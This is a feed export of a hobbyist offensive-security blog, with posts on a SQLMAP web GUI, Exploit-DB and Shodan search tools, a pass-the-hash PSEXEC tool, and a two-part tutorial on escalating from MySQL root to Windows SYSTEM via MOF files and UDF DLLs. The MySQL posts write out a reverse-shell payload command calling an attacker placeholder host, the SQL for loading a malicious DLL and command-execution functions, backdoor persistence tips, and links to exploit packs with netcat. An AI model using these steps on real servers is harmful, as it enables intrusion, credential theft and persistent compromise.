tag:blogger.com,1999:blog-86718069053079058312024-03-20T10:06:38.501-05:00Kaotic CreationsHRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.comBlogger69125tag:blogger.com,1999:blog-8671806905307905831.post-51738510113439793242015-03-19T23:29:00.001-05:002015-03-19T23:29:53.130-05:00SQLMAP Web GUIIt has certainly been a while :)<br />
<br />
The last few weeks I have been teaching myself a little PHP to help improve my skills and knowledge. In the process I decided to try and make a Web GUI for SQLMAP. When I originally started I was unaware of the JSON API that they already have available through sqlmapapi.py (available from latest versions in github repo). The API itself is not documented anywhere really so I took it as a small challenge to see what I might be able to slap together. You can find most of the API functionality documented to best of my ability in the SQLMAPClientAPI.class.php file I wrote, hopefully it will be helpful to others in the future that look to expand or write cooler GUI's and apps for the API.<br />
<br />
Quick View of the core SQLMAPClientAPI.class.php:
<script src="http://pastebin.com/embed_js.php?i=ppYhaxwW"></script>
<br />
<br />
<br />
Now once I had that working, I decided to dive on into trying to make a front end. To date, I have only ever really tried breaking web applications, never really building them (I think I learned things backwards and wouldn't advice this path to others). I decided to use Bootstrap since it was easy to pickup and run with and well documented. The look is clean and simple for now, meets my minimum for acceptability test I suppose but leaves lots of room for improvements if you do this on a regular basis. I documented things in the source as best I could, where I could, but nothing too magical with the front end work and as I said plenty of room for further improvements...<br />
<br />
A few snapshots to show off the basic view:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/oK9oyI4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/oK9oyI4.png" height="328" width="400" /></a></div>
<br />
<br />
I broke the form up into tabbed areas to make it all a little easier to swallow since SQLMAP has a whole lot of options to configure scans with. The actual scan opens in a new tab so you dont loose all the form data and allows you to continue enumerating target as you build up info (I like it this way :p).<br />
<br />
<b>Request modifications:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/FafmKwa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/FafmKwa.png" height="268" width="400" /></a></div>
<br />
<b>Detection modifications:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/z0G63xN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/z0G63xN.png" height="291" width="400" /></a></div>
<br />
<br />
<b>Injection & Technique modifications:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/6vl5YMa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/6vl5YMa.png" height="291" width="400" /></a></div>
<br />
<br />
<b>Enumeration & Data Dumping modifications:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/etZnE4z.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/etZnE4z.png" height="291" width="400" /></a></div>
<br />
<br />
<b>System Access & Advanced Exploitations:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Zb436l3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/Zb436l3.png" height="291" width="400" /></a></div>
<br />
You can find the code on Github for your forking, pulling, and pushing delights: <a href="https://github.com/Hood3dRob1n/SQLMAP-Web-GUI" target="_blank">https://github.com/Hood3dRob1n/SQLMAP-Web-GUI</a><br />
<br />
<u><b>How to get things setup:</b></u><br />
<ul>
<li> Install SQLMAP and all necessary dependencies per the standard sqlmap instructions...</li>
<li> Get a basic LAMP setup going per your favorite distro's guide</li>
<ul>
<li> <b>NOTE: </b>MySQL is not being used for this project at this point in time</li>
</ul>
<li> Download the Web GUI files from my new github repo I created (<a href="https://github.com/Hood3dRob1n/SQLMAP-Web-GUI">https://github.com/Hood3dRob1n/SQLMAP-Web-GUI</a>)</li>
<ul>
<li>Edit the sqlmap/inc/config.php from the GUI files so the correct paths are in place for your box</li>
<li>Then copy all the web_gui/sqlmap/ files to the web root directory for your server /var/www/sqlmap/</li>
</ul>
<li> Start up the API server when you want to use it, otherwise GUI will fail</li>
<li> Surf to your new SQLMAP Web GUI in browser to enjoy</li>
</ul>
<br />
Here is a few quick videos I made to show that almost all of your usual SQLMAP command line functionality is still possible via the Web GUI. <br />
<br />
<b>Demo against: Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005</b><br />
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/8MRew20Q1xE" width="560"></iframe>
<br />
<br />
<b>Demo against: Linux (CentOS), Apache, MySQL, PHP</b><br />
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/cs2Gvss0v-k" width="560"></iframe>
<br />
<br />
<br />
<br />
It is entirely possible that the API Server runs on one server while the Web GUI Frontend runs on a different server, simply make the proper edits to the config file so they can communicate. There still remain a few obstacles in some advanced functions I want to add due to how the API Server works. I plan to try and work on them as time goes on. I had several friends tell me to put this out there and I feel pretty happy with where things are for now that I decided to share with everyone that might be interested.<br />
<br />
Open to suggestions and feedback, hope you guys like it!<br />
<br />
<br />
<u><b>My Current ToDo List:</b></u><br />
<ul>
<li>Ask SQLMAP team to modify the logger or work with me on how to extract info log while it is running scan</li>
<ul>
<li>Would love to present scan log info while the spinner wheel is running during an active scan so you know what is going on</li>
<li>Currently the scan log info seems to be set in a blocking manner so that the active scan needs to finish before logs can be parsed/extracted from API</li>
<li> The admin panel seems to suffer from this blocking behavior as well. </li>
<ul>
<li>I would like to improve this function/feature in future but current blocking behavior makes it too annoying to work on for now</li>
</ul>
</ul>
<li>Ask SQLMAP team to modify the --answer delimiter value or allow custom one to be set</li>
<ul>
<li>Affects ability to pass in more than one path when using file write options (which takes a csv list of paths, but --answer mistakes them as multiple answers instead)</li>
</ul>
<li>Ask if MSF Advanced Exploit options (--os-pwn, --os-smb, --os-bof, --priv-esc) could be prompted differently</li>
<ul>
<li>Currently assumption is that sqlmap attack box is the box that should also accept MSF payload call backs</li>
<li>Should allow new option to be added so user can specify a remote IP and PORT instead of local IP/PORT</li>
<li>Current setup causes API to hang in an infinite loop if a remote IP/PORT specified</li>
<li>The GUI version of these is disabled until can fix</li>
</ul>
<li>The --os-cmd option doesn't seem to return output to API properly with MySQL (works fine for MS-SQL), more testing needed to report bug if indeed a bug...</li>
<li>Ask if SQLMAP team would consider moving away from using Python's pickle method for serializing options passed from API to CLI</li>
<ul>
<li>Also use a different web server that doesn't use the same pickle method</li>
<li>pickle.loads() and pickle.dumps() are known to be susceptible to Python Object Injection attacks that can lead to code execution</li>
<li>Current use of API Server doesn't call the vulnerable cookie decoder the bottle server has built in, so safe for now...</li>
<ul>
<li>Currently my attempts to find a working exploit seem to break the json which stops it from passing through to execute by sqlmap</li>
<li>I'm concerned someone smarter than me can figure it out and find a way to sneak some pickled py code through to achieve rce</li>
<li>If you know how, please show or send me a quick POC as I would love to see how it is accomplished in this particular situation</li>
</ul>
<li>Until this is address or confirmed safe by more people, I can't widely suggest or really recommend running this Web GUI on a open web facing server to untrusted users of the interwebs</li>
<li>Did my best to secure the few areas I found problems with for trying to get it to be safe web facing</li>
<ul>
<li>Nothing can be done without API server running so secure enough for me to use locally or spin up as needed, you will need to decide your own security...</li>
</ul>
</ul>
<li>Add options to config.php to allow settings or levels to activate and expose some of the other options not currently available as of right now</li>
<ul>
<li>evalCode, proxy options, tor use, etc</li>
</ul>
<li>Do more testing:</li>
<ul>
<li>May have some issues with PHP < 5.3, not tested and still a PHP n00b so all bets are off...</li>
<li>Setups Confirmed Working:</li>
<ul>
<li>Debian 7, PHP 5.4.4-14+deb7u14</li>
<li>Debian 7, PHP 5.4.36-0+deb7u3</li>
<li>Ubuntu 12, PHP 5.3.10-1ubuntu3.17</li>
<li>Kali w/PHP 5.4</li>
</ul>
</ul>
</ul>
<br />HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com6tag:blogger.com,1999:blog-8671806905307905831.post-78057153593968329662014-01-13T17:45:00.003-06:002014-01-13T17:45:42.902-06:00Searchsploit-rb - Exploit-DB Search Tool gets an upgrade?<a href="http://www.exploit-db.com/" target="_blank">Exploit-DB</a> is pretty famous for their collection of exploits and papers and if you are not familiar with them then then you should use some Google-fu to check up on them. They should be a bookmark found in pretty much any hackers handbook. In the past they had made their full archive available for download over HTTP, which was shaky at best and unless you scheduled it with cron or something you never knew if you had the latest and greatest and updating from a scripted manner was not always reliable (for me anyways). I had previously coded this tool in the past for the old archive methods, but today I noticed on Reddit they have moved to Github - w00t! This makes things much easier for everyone, well most people anyway.<br /><br />Now they have had their archive collection for some time and the searchsploit bash script works just fine, however it can be too simplistic at times and not yield the results we want, unless you match your search syntax to its janky search method. It also lacks color and output logging. I had some time this morning so I decided to update my old script to take advantage of the simplicity of Github to allow easy fetching of new copies and/or updating existing ones. I also added a bit of color to the presentation of the results. It's very helpful for me so thought I would share with the rest of you...<br /><br />
To download exploit-db archives on your own from command line using normal git client:<br />COMMAND: git clone https://github.com/offensive-security/exploit-database.git<br /><br />Then to update from command line when you want, you simply pull:<br />COMMAND: git pull<br /><br />This can all be done from within my tool so now you can update and search from one place :) Here is a quick overview and a link to my Github page where you can find it.<br /><br />Help Menu:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/bHDa92C.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://i.imgur.com/bHDa92C.png" width="400" /></a></div>
<br />
<br />
<br />
If it can't find the archive setup, it will offer to download via git for you:<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/b8IcaFg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://i.imgur.com/b8IcaFg.png" width="400" /></a></div>
<br />
Search by a range of options with option to log results to file:<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/SwObzJQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/SwObzJQ.png" width="400" /></a></div>
<br />
<br />
<b>NOTE:</b> this can be handy when you get a lot of results (SQL Injection searches mostly...)<br />
<br />
Easy peazy updating now that things can leverage Github:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/YGXDVtf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://i.imgur.com/YGXDVtf.png" width="400" /></a></div>
<br />
<br />
<br />
You can find things on <a href="https://raw.github.com/Hood3dRob1n/Exploit-DB-Local-Archive-Search-Tool/master/searchsploit-rb" target="_blank">my Github page</a>:<br />git clone https://github.com/Hood3dRob1n/Exploit-DB-Local-Archive-Search-Tool.git<br /><br />Should only need to install the 'colorize' gem to get things started with ruby:<br />
sudo gem install colorize<br />
<br />
<br />
<br />
<br />
<br />
Special thanks to everyone on the <a href="http://www.offensive-security.com/" target="_blank">Offesive Security</a><br /> team that helps to make <a href="http://www.exploit-db.com/" target="_blank">exploit-db</a> and all of their other awesome projects possible!<br />
<br />
Until next time, enjoy!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com2tag:blogger.com,1999:blog-8671806905307905831.post-84149761710571110042014-01-08T17:24:00.001-06:002014-01-08T17:24:22.072-06:00Shodan Search Tool w/My Ruby API ClassToday I just wanted to share a little something I made for <a href="http://www.shodanhq.com/" target="_blank">Shodan</a>. If you don't know what <a href="http://www.shodanhq.com/" target="_blank">Shodan</a> is, then I highly recommend you check them out and do some quick googling to see what others have done with its help. I initially tried using their published ruby gem and published API documentation but it failed miserably (likely could just be me, but seems their code is outdated with how their site provides output now, idk). I really like <a href="http://www.shodanhq.com/" target="_blank">Shodan</a> though so I decided to create my own version of their API so I could get started on making a cool search assistant I can run from the command line with some basic logging for analysis after. Once I finished redoing the API class, I made a little CLI based search tool to make quick Shodan research a snap and am now sharing with the rest of the world, hope its helpful for others.<br />
<br />
<b>Prerequisites:</b><br />
sudo gem install colorize curb json nokogiri<br />
<br />NOTE: curb uses libcurl under the hood so you might need to install this if not already included on your OS <br />
<br />
Basic Help Menu:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ETEpRuJ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/ETEpRuJ.png" height="321" width="400" /></a></div>
<br />
<br />
You can run a basic Shodan search and display the results, which are also logged to the results folder.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/dfsB8Ci.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/dfsB8Ci.png" height="225" width="400" /></a></div>
<br />
<br />
The logged results are overwritten on each search so you need to rename it or move it if you want to use it later and plan to run multiple searches. <br />
<br />
I also made option for quick search which runs a Shodan search and returns the list of IP addresses from results, skipping all the details. I typically run a normal search, then a follow up quick search on same keywords to pass of lists to other tools in a speedy fashion while manual review is more involved with the full search results...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/eR4PhMa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/eR4PhMa.png" height="225" width="400" /></a></div>
<br />
Shodan also offers up a nice search feature to search for exploits which leverages multiple exploit databases. I currently have the Exploit-db and Metasploit search engines available and fully working. This means you can easily search for known exploits with variety of keywords and get matching results displayed and logged for you. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/mHowhix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/mHowhix.png" height="400" width="381" /></a></div>
<br />
You can even download the exploit/poc code from search results by referencing the ID number from results.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/bCDEa4U.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/bCDEa4U.png" height="225" width="400" /></a></div>
<br />
<u><b>ToDo List: </b></u><br />
Include options to search tool for premium search options (somewhat built into my API Class already but not in tool). Include a Gemfile for easy installs for bundler lovers. Also I have not uploaded things to Github yet as I fried my old box and lost a lot of stuff, working on recovery still but should have it updated soon. Until then you can find things on Pastebin, available for a long while...<br />
<br />
<u><b>My Shodan API Standalone Class:</b></u><br />
<br />
<b>Direct link: </b><a href="http://pastebin.com/q6LZJqcD">http://pastebin.com/q6LZJqcD</a><br />
<br />
<br />
<b><u>My Shodan API Search Tool, Source Code:</u></b><br />
<br />
<script src="http://pastebin.com/embed_js.php?i=B0SdmmrX"></script>
<b>Direct Link: </b><a href="http://pastebin.com/B0SdmmrX">http://pastebin.com/B0SdmmrX</a><br />
<br />
Helpful for me, hope it is for you too!<br />
<br />
Until next time, Enjoy!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com3tag:blogger.com,1999:blog-8671806905307905831.post-70558322883138543612013-12-31T12:14:00.000-06:002013-12-31T12:14:08.499-06:00XMAS Gifts from ifixit.com for Bug BountyI just wanted to give a quick shout out to the nice folks over at <a href="http://ifixit.com/">ifixit.com</a>. I recently <a href="http://www.ifixit.com/Info/Responsible_Disclosure" target="_blank">submitted</a> a few small bugs to them and they were hands down the nicest folks I have ever communicated with when it comes to reporting of bugs! They were very responsive in all communications and in patching of the site. They added me to their r<a href="http://www.ifixit.com/Info/Responsible_Disclosure" target="_blank">esponsible disclosure page</a> and even sent me some nice swag as a added thanks. The gear arrived to me on Christmas morning which made my day even better! Thanks <a href="http://ifixit.com/">ifixit.com</a><br />
<br />
T-Shirt, Handy Mini Toolset & Stickers:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/MuUsLJW.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/MuUsLJW.jpg" width="300" /></a></div>
<br />HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com5tag:blogger.com,1999:blog-8671806905307905831.post-44058411217761116422013-11-08T12:36:00.000-06:002013-11-08T12:36:38.882-06:00Yet Another SMB PSEXEC (Y.A.S.P) ToolI was working on my own version of an updated standalone PSEXEC tool in ruby, leveraging the MSF standalone as a base along with some of the newer modules that have been released. Unfortunately SMBEXEC 2.0 was recently released which pretty much does the same thing functionality wise but has threading so its probably a bit cooler but thought I would still post mine out there for anyone who cares to take it for a spin. It is single target focused and a little different in the look and feel in comparison to some of the others available so who knows. It works for me, hope it works for someone else too....<br />
<br />
I first started off trying to do things on my own by writing classes to wrap the smbclient tool which now supports the pass-the-hash option or can be fairly easily patched to address this. This Samba suite also includes the rpcclient tool which I originally planned to leverage to make some magic happen. Well I got the wrappers working, but was not able to get things fully working with just these two classes. I do recommend playing around with rpcclient as it is an interesting tool and can lead to a lot of insight against a remote target but that's another story. So after giving up on the rpcclient option i did some checking on the net and found some great references from Mubix and Chris Gates on the MSF standalone tool and some ways to play with it. As Chris and Rob point out the librex library is available outside of MSF as a standalone gem which gives you tons of power to do all kinds of neat things on your own. Being that the hard work was already done and available as reference in MSF i decided to borrow what i could from there and merge with my own wrappers and code to get what I wanted. The end result is an smbclient with all the psexec fun and then some.<br />
<br />
It can do some basic recon without creds, which I am working on improving but its main focus is on re-using valid credentials. Once authenticated it's capable of running single commands using the PSEXEC technique or jumping into a pseudo shell to execute multiple commands.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/NnAiy2Q.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/NnAiy2Q.png" width="400" /></a></div>
<br />
<br />
Download registry hives for offline pillaging<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/F7ITVRi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/F7ITVRi.png" width="400" /></a></div>
<br />
<br />
Leverage MSFVENOM to generate shellcode and then run payloads using PowerShell (my favorite):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/niGP7PY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/niGP7PY.png" width="400" /></a></div>
<br />
NOTE: You need to specify the hostname for Vista+ targets or connection will fail. You can use raw netbios requests or tool like nbtscan to find this pretty quickly and without any pain. On older targets you can omit this field for connection configuration.<br />
<br />
The full list of available options once authenticated:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/sBJMVEh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="381" src="http://i.imgur.com/sBJMVEh.png" width="400" /></a></div>
<br />
<br />
And here are a few demo videos I made to show off how you can use it....<br />
<br />
Y.A.S.P. vs Standalone 2k3 Server:<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/jA1THWguUtE" width="560"></iframe>
<br />
<br />
<br />
Y.A.S.P. + PowerShell Payload vs Windows 7:<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/2uqmDKHQk9M" width="560"></iframe>
NOTE: It does leverage MSFVENOM currently to generate shellcode which gets converted over to PowerShell acceptable format and then executed via PowerShell command<br />
<br />
<br />
<br />
<br />
Y.A.S.P. vs 2k3 Domain Controller + Active Directory Dumping 101:<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/1eSDw2me-6A" width="560"></iframe>
<br />
<br />
<br />
You can find all the source code along with all the tools used or referenced in the above videos on my github page here: <a href="https://github.com/Hood3dRob1n/Y.A.S.P." target="_blank">SOURCE + TOOLS</a><br />
<br />
You can keep an eye on Github as I will be working on this one over time to smooth out a few things and add a few more things to it which I wasn't comfortable with rolling out just yet but again just sharing to share and inspire more coders to code cool shit. Until next time, Enjoy! HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com2tag:blogger.com,1999:blog-8671806905307905831.post-63638423096866742672013-10-19T22:44:00.003-05:002014-01-31T17:44:55.531-06:00Battling Windows MySQL: From root to SYSTEM (Part II: User Defined Function (UDF) Exploitation) This is part 2 of a 2 part series on exploiting Windows MySQL instances to gain high privileged shell access. This part will focus on exploiting MySQL User Defined Functions (UDF) through feeding them malicious DLL files at function creation and linkage time. The methods will follow very similar course to our first .MOF exploitation technique. We will will need to upload a binary payload, this time instead of an EXE file it will be a DLL file but should not really affect our uploading method we created previously. Our magic location will be changing however....<br />
<br />
MySQL has a feature to allow administrative users to add additional functions and procedures to help extend its abilities. These User Defined Functions are mapped to a .SO file on Unix systems and .DLL files on Windows systems at function creation time. It is this linked trust that we will be exploiting to gain code execution. MySQL looks for these functions instructions in the MySQL plugins directory. This directory value can be queried by checking the @@plugins_dir value. If this is not available for whatever reason you can use a query "SHOW VARIABLES LIKE 'basedir';" and then fill in the '/lib/plugins/' path to the end of the value received. Make sure you escape paths when re-using this value if your coding this or you will run into issues ;) <br />
<br />
We upload a binary (payload.dll) to the plugins directory (c:\SOMEPATH\bin\mysql\mysql5.5.24\lib\plugin\)....using our code from part I this can be easily accomplished...<br />
<br />
We then create a function which triggers our DLL payload:<br />
<b>SQL QUERY: </b>CREATE FUNCTION fake_function_name RETURNS string SONAME 'payload.dll';<br />
<br />
MySQL will look in the plugin directory for 'payload.dll' to load into memory and then look for the needed information to build the functions and then make available to users. If you have a legitimate UDF DLL/SO file being loaded then it will create the function and you can then make use of those functions in MySQL immediately after. If the DLL/SO file doesn't not have proper headers and can't be loaded to not finding the function name and associated code, it will fail to create the function. This is no real concern to us hackers/auditors/pentesters/whomeveryouare as at this point it is already over. The code execution occurs as soon as it is loaded to check! The UDF file we write will remain on target, but no function to cleanup after. You can generate DLL payload files with MSF fairly easy to make this nice and easy to pass things off to MSF. I have found it best in my experience to roll in first with a standard command shell and then use MSF session upgrade option to upgrade from normal shell to a meterpreter session. It will actually run the needed commands through the existing channel and then using a command stager will generate a new connection for the meterpreter so you will end up with two sessions when it is complete. <br />
<b><br /></b>
<b>MSFVENOM PAYLOAD GENERATION: </b>msfvenom -p windows/shell/reverse_tcp LHOST=ATTACKERIP LPORT=4444 -f dll > payload.dll<br />
<b>MSF SESSION UPGRADE (Post Exploit):</b> sessions -u <sessionID#><br />
<br />
New Ruby Code Additions to our previous snippet (write_bin_file() was used to house our code from part I for uploading):<br />
<br />
<script src="http://pastebin.com/embed_js.php?i=H7zNtC9B"></script>
Now the author of SQLMAP helped to write and publish some custom user defined functions which allow one to interact with the underlying operating system. We can use these to upload and successfully create new functions which will allow us to execute code through SQL queries leveraging the UDF functions. The entire UDF package has 3-5 functions, but for us we care mostly about 2 - sys_exec() & sys_eval(). The first, sys_exec(), allows one to run a system command through it and returns 0 on success or 1 on failure or other. This can be leveraged to execute blind commands. If you need the command output then you will need to go with the sys_eval() function which allows you to run commands AND grab the output from results. The key when your setting up your new functions is making sure you define the results data type properly. If you have uploaded the lib_mysqludf_sys.dll then you can perform the following queries to load the custom functions:<br />
<br />
<b>SQL: </b>CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';<br />
<b>SQL:</b> CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';<br />
<b>NOTE: </b>small difference in integer vs string result expectations!<br />
<br />
I have focused on Windows as this yields greatest success. Unix systems are also vulnerable to the UDF attack (MOF is windows only) however most modern systems implement AppArmor or other techniques which prevent the MySQL user from writing to the needed plugins directory to pull it off. This means you need root privileges to get things to work. Not very common for MySQL to be running as root, but you never know. That being said, it is a nice way to backdoor a system post compromise as you can leverage the sys_exec() or sys_eval() functions to achieve command execution as a way back in. These functions can be accessed via direct connection or through SQL injection, anywhere you can execute SQL queries which can call the necessary functions so I am sure you can think of some sneaky way to use it.<br />
<br />
<b>VIDEO DEMO: </b><a href="http://youtu.be/N0fn2dWlUFI" target="_blank">YouTube</a><br />
<br />
<b>Download Full Exploiter Pack: <a href="http://uppit.com/48e6d2lfnsyy/myudf.zip" target="_blank">DOWNLOAD</a></b><br />
<b>NOTE:</b> contains UDF DLLs for sys exec functions as well as template for reverse shell in /payloads<br />
<br />
<b>UPDATE: </b>You can now find this on my Github page here: <a href="https://github.com/Hood3dRob1n/SQLi">https://github.com/Hood3dRob1n/SQLi</a> <br />
<br />
<b>Pure Ruby Core Source Code: <a href="http://pastebin.com/yTY7aKtF" target="_blank">PASTEBIN</a></b><br />
<br />
Hope you have enjoyed this two part series. These methods can be used outside of MySQL exploitation but this is an angle I was not previously familiar with and yields very high payouts when it works so thought I would share and highlight this more for others.... <br />
<br />
Until next time, Enjoy!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com2tag:blogger.com,1999:blog-8671806905307905831.post-80059424695320940742013-10-19T22:43:00.001-05:002014-01-31T17:44:29.520-06:00Battling Windows MySQL: From root to SYSTEM (Part I: MOF Exploitation)In this two part series I am going to share two methods you can use to gain command execution against Windows MySQL instances when you have privileged MySQL user account. First here in part one, I will cover MOF exploitation technique and then in part 2 I will go over the UDF (User Defined Function) DLL Injection method. They both exploit the MySQL Service which on Windows typically runs as SYSTEM so this can be a very high payout for the exploit as SYSTEM level access means full compromise of the local box if successful. The MOF exploit is very stable and works against pre-Vista machines like XP and Server 2003 while UDF method has less restrictions.<br />
<br />
<u><b>What the heck is a .MOF File?</b></u><br />
First and foremost this is a Windows specific file format so automatically rules out non-Windows based targets, sorry. Some nice quotes i pulled from the web "A MOF file contains MOF language statements, compiler directives and comments". "A MOF file can be encoded in either Unicode or UTF-8 format. MOF files are text files that contains definitions of classes and instances using the Managed Object Format (MOF) language." We can leverage their design to use JScript, ActiveXObject and WScript.Shell to run commands or whatever other cool wizardry you can come up with. The code in these files is fairly harmless until it is compiled by a binary tool which comes on windows boxes called 'mofcomp.exe'. The Managed Object Format (MOF) compiler (mofcomp.exe) parses the passed files and adds the classes and class instances defined in the file to the WMI repository which allows the magic to happen. If you want to read more on mofcomp.exe check <a href="http://msdn.microsoft.com/en-us/library/aa392389%28v=vs.85%29.aspx" target="_blank">here</a>. If you want to write your own custom .MOF file to do even more whimsical magic sorcery?. Read up on the specs and requirements <a href="http://www.dmtf.org/sites/default/files/standards/documents/DSP0221_3.0.0.pdf" target="_blank">here</a>. <br />
<br />
Now in Pre-Vista Windows there is a magical home for .MOF files which need compiling by mofcomp.exe tool, and this is at 'c:\windows\system32\wbem\mof\'. Apparently on pre-Vista versions this directory is periodically scanned for new additions. Anything new it finds is passed along to mofcomp.exe and auto-compiled, no human interaction needed. This is our ticket to privilege escalation or our way in when it comes to exploiting MySQL for command execution with this technique. On Windows MySQL tends to run as a privileged user and there are no default restrictions to where this user can write as result - which means we can write files to this magic directory as MySQL user! If we can craft a .MOF template sneaky enough and write it there, it will auto-compile it running our code inside. I should note that after it is compiled by mofcomp.exe it is moved into the 'c:\windows\system32\wbem\mof\<b>good</b>\' directory, if anything fails during compiling it is moved to 'c:\windows\system32\wbem\mof\<b>bad</b>\'. It is worth mentioning that there is also a log file for all mofcomp.exe actions taken which can be found at 'c:\windows\system32\wbem\Logs\mofcomp.log'. This log contains a time-stamp and reference to files compiled along with any errors encountered.<br />
<br />
<b>FUN FACT:</b> If you write files here and have them compiled, they will run repeatedly until deleted. Also due to this cyclical nature you can end up with commands occasionally running one more time even after removal of the actual .MOF payload file. For example if you run a onetime instance to create a new user account. It will keep being created if the admin doesn't find the MOF file and simply keeps trying to delete the account itself.....re-appearing accounts for red team pranks anyone?<br />
<br />
<br />
<b>Connecting the dots to get a shell:</b><br />
Now that you know about this magical place, and you have read my previous tutorials on writing files with MySQL this wont be a giant leap for us. We first will need to come up with a way to upload a binary file from our local machine to the remote machine. In order to do this we read the file in binary mode, then convert to hex formatting to make injection easy. We will also make a point of using DUMPFILE so its writing as a single line and wont mess with our binary format. Once the file is written, it happens almost instantly but may take a minute or two to get scanned and run so be patient before completely walking away.<br />
<br />
Ruby Code to Read Binary and Upload (passed a db connection object, the local file path, and the destination path on target):<br />
<br />
<script src="http://pastebin.com/embed_js.php?i=HwR1Xhq1"></script>
<br />
Now when it comes to the .MOF template for code execution with this method i borrowed what I could find to suit my needs. I actually found a random PHP version of this exploit sitting on a server I was auditing! It was using a simple template to run commands one at a time through WScript.Shell.run() so I used that as a base for command execution as it compiles without issues in all my tests. I then took the beefier version from MSF found in the /msf/lib/msf/core/exploit/wbemexec.rb script and used for their version of this exploit. This .MOF template takes the location to binary.exe to run (it also has some built-in cleanup code to remove files after). We can use either template to our liking, we can use the simpler template to execute single command at a time or we can use the fancy template to run a binary (which we need to upload before hand). I came up with some code to leverage these features and techniques to achieve code execution, raw binary file uploading via SQL, reverse shell via uploading of nc.exe and then running single command to call home with cmd.exe attached. Below is a quick video demonstration to show you how things can work with the MOF exploit when you find yourself with privileged user access to MySQL on Windows box. You can also find the source code and download links below that. <br />
<br />
<u><b>VIDEO:</b></u> <a href="http://youtu.be/6bsoqDHtKlY" target="_blank"><b>YouTube</b></a><br />
<br />
<b><u>Download Full Exploiter Pack:</u></b> <a href="http://uppit.com/tmhmzm7082ie/mymof.zip" target="_blank"><b>DOWNLOAD</b></a><br />
<b>NOTE: </b>Contains nc.exe & sbd.exe in /payloads)<br />
<br />
<b>UPDATE:</b> You can now find this on my Github page here: <a href="https://github.com/Hood3dRob1n/SQLi">https://github.com/Hood3dRob1n/SQLi</a><br />
<br />
<u><b>Pure Ruby Core Source Code: </b></u><a href="http://pastebin.com/grQkk79T" target="_blank"><b>PASTEBIN</b></a><br />
<b></b><br />
<b></b><br />
<b></b><br />
<b></b><br />
<b></b><br />
<b><br />Food for thought: </b>This method supposedly doesn't work on newer instances due to them not auto-compiling the .MOF files like we see done with XP and 2k3 systems. Not tested but curious what happens if we pre-compile with mofcomp.exe ourselves and then write to the updated /good/ location.....<br />
<br />
